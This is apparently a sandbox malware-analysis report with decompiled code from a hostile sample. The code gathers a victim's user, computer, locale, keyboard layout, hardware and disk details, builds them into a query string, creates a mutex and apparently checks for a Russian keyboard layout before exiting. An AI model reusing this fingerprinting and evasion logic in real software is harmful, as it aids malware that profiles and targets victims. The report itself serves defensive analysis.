                                        0x0f9d74ad
                                        0x0f9d74b6
                                        0x0f9d74c0
                                        0x0f9d74c5
                                        0x0f9d74c8
                                        0x0f9d74cd
                                        0x0f9d74d4
                                        0x0f9d74dd
                                        0x0f9d74df
                                        0x0f9d74e2
                                        0x0f9d74ec
                                        0x0f9d7507
                                        0x0f9d7564
                                        0x0f9d7564
                                        0x0f9d7566
                                        0x00000000
                                        0x0f9d7566
                                        0x0f9d750c
                                        0x0f9d7529
                                        0x0f9d7534
                                        0x0f9d752b
                                        0x0f9d752b
                                        0x0f9d752b
                                        0x0f9d753d
                                        0x0f9d7547
                                        0x00000000
                                        0x0f9d7549
                                        0x0f9d7559
                                        0x0f9d763a
                                        0x0f9d763c
                                        0x0f9d7641
                                        0x0f9d7641
                                        0x0f9d755f
                                        0x0f9d755f
                                        0x0f9d7569
                                        0x0f9d7569
                                        0x0f9d757e
                                        0x0f9d7580
                                        0x0f9d758d
                                        0x00000000
                                        0x0f9d7593
                                        0x0f9d740e
                                        0x0f9d7410
                                        0x0f9d7413
                                        0x0f9d742b
                                        0x0f9d743a
                                        0x0f9d747e
                                        0x0f9d7488
                                        0x0f9d748f
                                        0x00000000
                                        0x0f9d748f
                                        0x0f9d743f
                                        0x0f9d745e
                                        0x0f9d7469
                                        0x0f9d7460
                                        0x0f9d7460
                                        0x0f9d7460
                                        0x0f9d7472
                                        0x0f9d747c
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0f9d73a2
                                        0x0f9d73b0
                                        0x0f9d73b2
                                        0x0f9d73b7
                                        0x00000000
                                        0x00000000
                                        0x0f9d73b9
                                        0x0f9d73cf
                                        0x0f9d73d6
                                        0x0f9d73f1
                                        0x0f9d73f1
                                        0x0f9d73f3
                                        0x00000000
                                        0x0f9d73f3
                                        0x0f9d73d8
                                        0x0f9d73df
                                        0x00000000
                                        0x00000000
                                        0x0f9d73f1
                                        0x00000000
                                        0x0f9d73f1

                                        APIs
                                        • VirtualAlloc.KERNEL32(00000000,00000202,00003000,00000004), ref: 0F9D7357
                                        • GetUserNameW.ADVAPI32(00000000,?), ref: 0F9D7368
                                        • VirtualAlloc.KERNEL32(00000000,00000020,00003000,00000004), ref: 0F9D7386
                                        • GetComputerNameW.KERNEL32 ref: 0F9D7390
                                        • VirtualAlloc.KERNELBASE(00000000,00000080,00003000,00000004), ref: 0F9D73B0
                                        • wsprintfW.USER32 ref: 0F9D73F1
                                        • VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 0F9D740E
                                        • RegOpenKeyExW.ADVAPI32(80000001,Control Panel\International,00000000,00020019,00000000), ref: 0F9D7432
                                        • RegQueryValueExW.ADVAPI32(00000000,LocaleName,00000000,00000000,0F9D4640,?), ref: 0F9D7456
                                        • GetLastError.KERNEL32 ref: 0F9D7469
                                        • RegCloseKey.ADVAPI32(00000000), ref: 0F9D7472
                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0F9D748F
                                        • VirtualAlloc.KERNEL32(00000000,0000008A,00003000,00000004), ref: 0F9D74AD
                                        • VirtualAlloc.KERNEL32(00000000,00000004,00003000,00000004), ref: 0F9D74C3
                                        • wsprintfW.USER32 ref: 0F9D74DD
                                        • RegOpenKeyExW.ADVAPI32(80000001,Keyboard Layout\Preload,00000000,00020019,?), ref: 0F9D74FF
                                        • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,0F9D4640,?), ref: 0F9D7521
                                        • GetLastError.KERNEL32 ref: 0F9D7534
                                        • RegCloseKey.ADVAPI32(?), ref: 0F9D753D
                                        • lstrcmpiW.KERNEL32(0F9D4640,00000419), ref: 0F9D7551
                                        • wsprintfW.USER32 ref: 0F9D757E
                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F9D758D
                                        • VirtualAlloc.KERNEL32(00000000,00000082,00003000,00000004), ref: 0F9D75AD
                                        • wsprintfW.USER32 ref: 0F9D75F6
                                        • GetNativeSystemInfo.KERNEL32(?), ref: 0F9D7605
                                        • VirtualAlloc.KERNEL32(00000000,00000040,00003000,00000004), ref: 0F9D7616
                                        • wsprintfW.USER32 ref: 0F9D763A
                                        • ExitProcess.KERNEL32 ref: 0F9D7641
                                        • wsprintfW.USER32 ref: 0F9D7669
                                        • VirtualAlloc.KERNELBASE(00000000,00000400,00003000,00000004), ref: 0F9D76A7
                                        • VirtualAlloc.KERNELBASE(00000000,00000E0C,00003000,00000004), ref: 0F9D76BA
                                        • GetWindowsDirectoryW.KERNEL32(00000000,00000100), ref: 0F9D76C4
                                        • GetVolumeInformationW.KERNELBASE(00000000,00000200,00000100,00000600,00000608,00000604,00000400,00000100), ref: 0F9D76FE
                                        • lstrlenW.KERNEL32(0000060C,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,ProcessorNameString,0000060C,00000080), ref: 0F9D7730
                                        • wsprintfW.USER32 ref: 0F9D7768
                                        • lstrcatW.KERNEL32(?,0000060C), ref: 0F9D777D
                                        • GetModuleHandleW.KERNEL32(ntdll.dll,RtlComputeCrc32), ref: 0F9D7789
                                        • GetProcAddress.KERNEL32(00000000), ref: 0F9D7790
                                        • lstrlenW.KERNEL32(?), ref: 0F9D77A0
                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0F9D77D1
                                          • Part of subcall function 0F9D7A10: VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004,74CB66A0,?,7491C0B0), ref: 0F9D7A2D
                                          • Part of subcall function 0F9D7A10: VirtualAlloc.KERNEL32(00000000,00000004,00003000,00000004), ref: 0F9D7AA1
                                          • Part of subcall function 0F9D7A10: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0F9D7AB6
                                          • Part of subcall function 0F9D7A10: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F9D7ACC
                                        • VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004), ref: 0F9D7828
                                        • GetDriveTypeW.KERNEL32(?), ref: 0F9D786F
                                        • lstrcatW.KERNEL32(?,?), ref: 0F9D7896
                                        • lstrcatW.KERNEL32(?,0F9E029C), ref: 0F9D78A8
                                        • lstrcatW.KERNEL32(?,0F9E0310), ref: 0F9D78B2
                                        • GetDiskFreeSpaceW.KERNEL32(?,?,0F9D4640,?,00000000), ref: 0F9D78C8
                                        • lstrlenW.KERNEL32(?,?,00000000,0F9D4640,00000000,00000000,00000000,0F9D4640,00000000), ref: 0F9D7910
                                        • wsprintfW.USER32 ref: 0F9D792A
                                        • lstrlenW.KERNEL32(?), ref: 0F9D7938
                                        • wsprintfW.USER32 ref: 0F9D794C
                                        • lstrcatW.KERNEL32(?,0F9E0330), ref: 0F9D795F
                                        • lstrcatW.KERNEL32(?,0F9E0334), ref: 0F9D796B
                                        • lstrlenW.KERNEL32(?), ref: 0F9D7986
                                        • VirtualAlloc.KERNEL32(00000000,00000081,00003000,00000004), ref: 0F9D79A9
                                        • VirtualFree.KERNEL32(?,00000000,00008000,00000000), ref: 0F9D79D0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.315641012.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 0000000E.00000002.315632959.000000000F9D0000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 0000000E.00000002.315651936.000000000F9DA000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 0000000E.00000002.315662109.000000000F9E2000.00000008.00000001.01000000.00000005.sdmp
                                        • Associated: 0000000E.00000002.315667422.000000000F9E4000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Virtual$Alloc$wsprintf$Freelstrcat$lstrlen$CloseErrorLastNameOpenQueryValue$AddressComputerCreateDirectoryDiskDriveExitHandleInfoInformationModuleNativeProcProcessSnapshotSpaceSystemToolhelp32TypeUserVolumeWindowslstrcmpi
                                        • String ID: %I64u$%I64u/$00000419$?:\$@$ARM$Control Panel\International$Domain$HARDWARE\DESCRIPTION\System\CentralProcessor\0$Identifier$Itanium$Keyboard Layout\Preload$LocaleName$ProcessorNameString$RtlComputeCrc32$SOFTWARE\Microsoft\Windows NT\CurrentVersion$SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion$SYSTEM\CurrentControlSet\services\Tcpip\Parameters$Unknown$WORKGROUP$error$ntdll.dll$productName$undefined$x64$x86
                                        • API String ID: 153366582-983031137
                                        • Opcode ID: 8d22d35a7f791f371599a240d171b864445a980667e64b03444b5a69ce305f9b
                                        • Instruction ID: 87f46a052380e17a54fa27737a3d91d83e7b1d83710cb35672e6a63a3a4e77ad
                                        • Opcode Fuzzy Hash: 8d22d35a7f791f371599a240d171b864445a980667e64b03444b5a69ce305f9b
                                        • Instruction Fuzzy Hash: C112BE70A40305AFEB218FA0CC46FAEBBB8FF44705F208518F741A61E2D7B5A964CB55
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        C-Code - Quality: 100%
                                        			// Serialises the optional fields of the structure at __ecx into the caller's buffer _a4
                                        			// as "key=value&key=value&...". Each field is a triple of (present flag, key pointer,
                                        			// value pointer); the field at +0x60 holds two numbers that are formatted with "%x%x".
                                        			// "=" and "&" are the decompiler's rendering of the wide strings at 0F9DFF50 and
                                        			// 0F9DFF54 (see the APIs list below); lstrcatW operates on WCHAR strings.
                                        			E0F9D6F40(intOrPtr* __ecx, WCHAR* _a4) {
                                        				WCHAR* _t47;
                                        				intOrPtr* _t91;
                                        				intOrPtr _t94;
                                        				WCHAR* _t96;
                                        
                                        				_t91 = __ecx;
                                        				_t96 = _a4;
                                        				if( *((intOrPtr*)(__ecx + 0x80)) != 0) {
                                        					lstrcatW(_t96,  *(__ecx + 0x88));
                                        					lstrcatW(_t96, "=");
                                        					lstrcatW(_t96,  *(_t91 + 0x84));
                                        					lstrcatW(_t96, "&");
                                        				}
                                        				if( *_t91 != 0) {
                                        					lstrcatW(_t96,  *(_t91 + 4));
                                        					lstrcatW(_t96, "=");
                                        					lstrcatW(_t96,  *(_t91 + 8));
                                        					lstrcatW(_t96, "&");
                                        				}
                                        				if( *((intOrPtr*)(_t91 + 0xc)) != 0) {
                                        					lstrcatW(_t96,  *(_t91 + 0x10));
                                        					lstrcatW(_t96, "=");
                                        					lstrcatW(_t96,  *(_t91 + 0x14));
                                        					lstrcatW(_t96, "&");
                                        				}
                                        				if( *((intOrPtr*)(_t91 + 0x18)) != 0) {
                                        					lstrcatW(_t96,  *(_t91 + 0x1c));
                                        					lstrcatW(_t96, "=");
                                        					lstrcatW(_t96,  *(_t91 + 0x20));
                                        					lstrcatW(_t96, "&");
                                        				}
                                        				if( *((intOrPtr*)(_t91 + 0x24)) != 0) {
                                        					lstrcatW(_t96,  *(_t91 + 0x28));
                                        					lstrcatW(_t96, "=");
                                        					lstrcatW(_t96,  *(_t91 + 0x2c));
                                        					lstrcatW(_t96, "&");
                                        				}
                                        				if( *((intOrPtr*)(_t91 + 0x30)) != 0) {
                                        					lstrcatW(_t96,  *(_t91 + 0x34));
                                        					lstrcatW(_t96, "=");
                                        					lstrcatW(_t96,  *(_t91 + 0x38));
                                        					lstrcatW(_t96, "&");
                                        				}
                                        				if( *((intOrPtr*)(_t91 + 0x3c)) != 0) {
                                        					lstrcatW(_t96,  *(_t91 + 0x40));
                                        					lstrcatW(_t96, "=");
                                        					lstrcatW(_t96,  *(_t91 + 0x44));
                                        					lstrcatW(_t96, "&");
                                        				}
                                        				if( *((intOrPtr*)(_t91 + 0x48)) != 0) {
                                        					lstrcatW(_t96,  *(_t91 + 0x4c));
                                        					lstrcatW(_t96, "=");
                                        					lstrcatW(_t96,  *(_t91 + 0x50));
                                        					lstrcatW(_t96, "&");
                                        				}
                                        				if( *((intOrPtr*)(_t91 + 0x54)) != 0) {
                                        					lstrcatW(_t96,  *(_t91 + 0x58));
                                        					lstrcatW(_t96, "=");
                                        					lstrcatW(_t96,  *(_t91 + 0x5c));
                                        					lstrcatW(_t96, "&");
                                        				}
                                        				if( *((intOrPtr*)(_t91 + 0x60)) != 0) {
                                        					// 0x42-byte scratch buffer: MEM_COMMIT|MEM_RESERVE (0x3000), PAGE_EXECUTE_READWRITE (0x40)
                                        					_t47 = VirtualAlloc(0, 0x42, 0x3000, 0x40); // executed
                                        					_t94 =  *((intOrPtr*)(_t91 + 0x6c));
                                        					_a4 = _t47;
                                        					if(_t94 == 0) {
                                        						wsprintfW(_t47, L"undefined");
                                        					} else {
                                        						wsprintfW(_t47, L"%x%x", _t94,  *((intOrPtr*)(_t91 + 0x70)));
                                        					}
                                        					lstrcatW(_t96,  *(_t91 + 0x64));
                                        					lstrcatW(_t96, "=");
                                        					lstrcatW(_t96, _a4);
                                        					lstrcatW(_t96, "&");
                                        					VirtualFree(_a4, 0, 0x8000); // executed; 0x8000 = MEM_RELEASE
                                        				}
                                        				if( *((intOrPtr*)(_t91 + 0x74)) != 0) {
                                        					lstrcatW(_t96,  *(_t91 + 0x78));
                                        					lstrcatW(_t96, "=");
                                        					lstrcatW(_t96,  *(_t91 + 0x7c));
                                        					lstrcatW(_t96, "&");
                                        				}
                                        				// overwrite the trailing '&' with a terminating NUL (WCHAR index = length - 1)
                                        				 *((short*)(_t96 + lstrlenW(_t96) * 2 - 2)) = 0;
                                        				return _t96;
                                        			}

                                        Instruction address column for E0F9D6F40 (one address per decompiled line, 0x0f9d6f44 to 0x0f9d7132)

                                        APIs
                                        • lstrcatW.KERNEL32(?,?), ref: 0F9D6F61
                                        • lstrcatW.KERNEL32(?,0F9DFF50), ref: 0F9D6F69
                                        • lstrcatW.KERNEL32(?,?), ref: 0F9D6F72
                                        • lstrcatW.KERNEL32(?,0F9DFF54), ref: 0F9D6F7A
                                        • lstrcatW.KERNEL32(?,?), ref: 0F9D6F85
                                        • lstrcatW.KERNEL32(?,0F9DFF50), ref: 0F9D6F8D
                                        • lstrcatW.KERNEL32(?,?), ref: 0F9D6F93
                                        • lstrcatW.KERNEL32(?,0F9DFF54), ref: 0F9D6F9B
                                        • lstrcatW.KERNEL32(?,?), ref: 0F9D6FA7
                                        • lstrcatW.KERNEL32(?,0F9DFF50), ref: 0F9D6FAF
                                        • lstrcatW.KERNEL32(?,?), ref: 0F9D6FB5
                                        • lstrcatW.KERNEL32(?,0F9DFF54), ref: 0F9D6FBD
                                        • lstrcatW.KERNEL32(?,?), ref: 0F9D6FC9
                                        • lstrcatW.KERNEL32(?,0F9DFF50), ref: 0F9D6FD1
                                        • lstrcatW.KERNEL32(?,?), ref: 0F9D6FD7
                                        • lstrcatW.KERNEL32(?,0F9DFF54), ref: 0F9D6FDF
                                        • lstrcatW.KERNEL32(?,?), ref: 0F9D6FEB
                                        • lstrcatW.KERNEL32(?,0F9DFF50), ref: 0F9D6FF3
                                        • lstrcatW.KERNEL32(?,?), ref: 0F9D6FF9
                                        • lstrcatW.KERNEL32(?,0F9DFF54), ref: 0F9D7001
                                        • lstrcatW.KERNEL32(?,?), ref: 0F9D700D
                                        • lstrcatW.KERNEL32(?,0F9DFF50), ref: 0F9D7015
                                        • lstrcatW.KERNEL32(?,?), ref: 0F9D701B
                                        • lstrcatW.KERNEL32(?,0F9DFF54), ref: 0F9D7023
                                        • lstrcatW.KERNEL32(?,0F9D4966), ref: 0F9D702F
                                        • lstrcatW.KERNEL32(?,0F9DFF50), ref: 0F9D7037
                                        • lstrcatW.KERNEL32(?,?), ref: 0F9D703D
                                        • lstrcatW.KERNEL32(?,0F9DFF54), ref: 0F9D7045
                                        • lstrcatW.KERNEL32(?,?), ref: 0F9D7051
                                        • lstrcatW.KERNEL32(?,0F9DFF50), ref: 0F9D7059
                                        • lstrcatW.KERNEL32(?,?), ref: 0F9D705F
                                        • lstrcatW.KERNEL32(?,0F9DFF54), ref: 0F9D7067
                                        • lstrcatW.KERNEL32(?,?), ref: 0F9D7073
                                        • lstrcatW.KERNEL32(?,0F9DFF50), ref: 0F9D707B
                                        • lstrcatW.KERNEL32(?,?), ref: 0F9D7081
                                        • lstrcatW.KERNEL32(?,0F9DFF54), ref: 0F9D7089
                                        • VirtualAlloc.KERNELBASE(00000000,00000042,00003000,00000040,00000000,00000000,?,?,0F9D4699,00000000,?,00003000,00000040,00000000,?,00000000), ref: 0F9D709C
                                        • wsprintfW.USER32 ref: 0F9D70B6
                                        • wsprintfW.USER32 ref: 0F9D70C7
                                        • lstrcatW.KERNEL32(?,?), ref: 0F9D70D4
                                        • lstrcatW.KERNEL32(?,0F9DFF50), ref: 0F9D70DC
                                        • lstrcatW.KERNEL32(?,?), ref: 0F9D70E2
                                        • lstrcatW.KERNEL32(?,0F9DFF54), ref: 0F9D70EA
                                        • VirtualFree.KERNELBASE(?,00000000,00008000,?,00000000,00000000,?,00000000), ref: 0F9D70F6
                                        • lstrcatW.KERNEL32(?,?), ref: 0F9D7106
                                        • lstrcatW.KERNEL32(?,0F9DFF50), ref: 0F9D710E
                                        • lstrcatW.KERNEL32(?,?), ref: 0F9D7114
                                        • lstrcatW.KERNEL32(?,0F9DFF54), ref: 0F9D711C
                                        • lstrlenW.KERNEL32(?,00000000,00000000,?,?,0F9D4699,00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F9D711F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.315641012.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 0000000E.00000002.315632959.000000000F9D0000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 0000000E.00000002.315651936.000000000F9DA000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 0000000E.00000002.315662109.000000000F9E2000.00000008.00000001.01000000.00000005.sdmp
                                        • Associated: 0000000E.00000002.315667422.000000000F9E4000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$Virtualwsprintf$AllocFreelstrlen
                                        • String ID: %x%x$undefined
                                        • API String ID: 3872469520-3801831566
                                        • Opcode ID: f222761f4124e5e41ce50eba9895cdc82a3febf678536e779fec42ecabd81e0d
                                        • Instruction ID: 50238e5268f9147d1b3f3daddc1a401e90855ba7c8e95b1c6fec1adecca871f2
                                        • Opcode Fuzzy Hash: f222761f4124e5e41ce50eba9895cdc82a3febf678536e779fec42ecabd81e0d
                                        • Instruction Fuzzy Hash: E9518330106654B6DB233F6ACC4AFDF3A1CEFC6304F158050FB152419B8B699256DFAA
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 0F9D39F0: GetProcessHeap.KERNEL32(?,?,0F9D4637,00000000,?,00000000,00000000), ref: 0F9D3A8C
                                          • Part of subcall function 0F9D7330: VirtualAlloc.KERNEL32(00000000,00000202,00003000,00000004), ref: 0F9D7357
                                          • Part of subcall function 0F9D7330: GetUserNameW.ADVAPI32(00000000,?), ref: 0F9D7368
                                          • Part of subcall function 0F9D7330: VirtualAlloc.KERNEL32(00000000,00000020,00003000,00000004), ref: 0F9D7386
                                          • Part of subcall function 0F9D7330: GetComputerNameW.KERNEL32 ref: 0F9D7390
                                          • Part of subcall function 0F9D7330: VirtualAlloc.KERNELBASE(00000000,00000080,00003000,00000004), ref: 0F9D73B0
                                          • Part of subcall function 0F9D7330: wsprintfW.USER32 ref: 0F9D73F1
                                          • Part of subcall function 0F9D7330: VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 0F9D740E
                                          • Part of subcall function 0F9D7330: RegOpenKeyExW.ADVAPI32(80000001,Control Panel\International,00000000,00020019,00000000), ref: 0F9D7432
                                          • Part of subcall function 0F9D7330: RegQueryValueExW.ADVAPI32(00000000,LocaleName,00000000,00000000,0F9D4640,?), ref: 0F9D7456
                                          • Part of subcall function 0F9D7330: RegCloseKey.ADVAPI32(00000000), ref: 0F9D7472
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7192
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D719D
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D71B3
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D71BE
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D71D4
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D71DF
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D71F5
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(0F9D4966,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7200
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7216
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7221
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7237
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7242
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7261
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D726C
                                        • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F9D465C
                                        • lstrcpyW.KERNEL32 ref: 0F9D467F
                                        • lstrlenW.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F9D4686
                                        • CreateMutexW.KERNELBASE(00000000,00000000,00000000,00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F9D469E
                                        • GetLastError.KERNEL32(?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F9D46AA
                                        • GetLastError.KERNEL32(?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F9D46B1
                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F9D46CB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.315641012.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
• Associated: 0000000E.00000002.315632959.000000000F9D0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000E.00000002.315651936.000000000F9DA000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000E.00000002.315662109.000000000F9E2000.00000008.00000001.01000000.00000005.sdmp
• Associated: 0000000E.00000002.315667422.000000000F9E4000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrlen$Virtual$Alloc$ErrorLastName$CloseComputerCreateFreeHeapMutexOpenProcessQueryUserValuelstrcpywsprintf
                                        • String ID: Global\
                                        • API String ID: 3131499543-188423391
                                        • Opcode ID: 91c9ba5e8016759d1d33f44c45847dda1f1c19209f221feeb9f128592384ed4e
                                        • Instruction ID: 7d452d390671e7f075607f68ebe5ffd14b81f1648f188002da5812e2c0d33988
                                        • Opcode Fuzzy Hash: 91c9ba5e8016759d1d33f44c45847dda1f1c19209f221feeb9f128592384ed4e
                                        • Instruction Fuzzy Hash: B12138316543117BF234A768DC4AF7F765CDB80B55FB00628F606660C2EAE87D14C6EA
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 193 f9d7c10-f9d7c1d 194 f9d7c1f-f9d7c29 VirtualFree 193->194 195 f9d7c2b-f9d7c2f 193->195 194->195 196 f9d7c3d-f9d7c41 195->196 197 f9d7c31-f9d7c3b VirtualFree 195->197 198 f9d7c4f-f9d7c53 196->198 199 f9d7c43-f9d7c4d VirtualFree 196->199 197->196 200 f9d7c55-f9d7c5f VirtualFree 198->200 201 f9d7c61-f9d7c65 198->201 199->198 200->201 202 f9d7c67-f9d7c71 VirtualFree 201->202 203 f9d7c73-f9d7c77 201->203 202->203 204 f9d7c79-f9d7c83 VirtualFree 203->204 205 f9d7c85-f9d7c89 203->205 204->205 206 f9d7c8b-f9d7c95 VirtualFree 205->206 207 f9d7c97-f9d7c9b 205->207 206->207 208 f9d7c9d-f9d7ca7 VirtualFree 207->208 209 f9d7ca9-f9d7cad 207->209 208->209 210 f9d7caf-f9d7cb9 VirtualFree 209->210 211 f9d7cbb-f9d7cc2 209->211 210->211 212 f9d7cc4-f9d7cd1 VirtualFree 211->212 213 f9d7cd3-f9d7cd5 211->213 212->213
                                        C-Code - Quality: 100%
			// Cleanup helper: walks the caller's context structure and releases each
			// buffer whose preceding flag field is non-zero. Every call uses
			// dwFreeType 0x8000 (MEM_RELEASE), so whole VirtualAlloc regions are returned.
			// The result of the last VirtualFree call is what the function returns.
			E0F9D7C10(intOrPtr* __ecx) {
				int _t20;
				intOrPtr* _t24;

				_t24 = __ecx;
				if( *__ecx != 0) {
					_t20 = VirtualFree( *(__ecx + 8), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0xc)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x14), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0x18)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x20), 0, 0x8000); // executed
				}
				if( *((intOrPtr*)(_t24 + 0x30)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x38), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0x3c)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x44), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0x48)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x50), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0x54)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x5c), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0x24)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x2c), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0x60)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x68), 0, 0x8000); // executed
				}
				if( *((intOrPtr*)(_t24 + 0x80)) != 0) {
					return VirtualFree( *(_t24 + 0x84), 0, 0x8000);
				}
				return _t20;
			}


                                        APIs
                                        • VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0F9D46DA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7C29
                                        • VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0F9D46DA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7C3B
                                        • VirtualFree.KERNELBASE(?,00000000,00008000,00000000,00000001,0F9D46DA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7C4D
                                        • VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0F9D46DA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7C5F
                                        • VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0F9D46DA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7C71
                                        • VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0F9D46DA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7C83
                                        • VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0F9D46DA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7C95
                                        • VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0F9D46DA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7CA7
                                        • VirtualFree.KERNELBASE(?,00000000,00008000,00000000,00000001,0F9D46DA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7CB9
                                        • VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0F9D46DA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7CD1
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.315641012.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
• Associated: 0000000E.00000002.315632959.000000000F9D0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000E.00000002.315651936.000000000F9DA000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000E.00000002.315662109.000000000F9E2000.00000008.00000001.01000000.00000005.sdmp
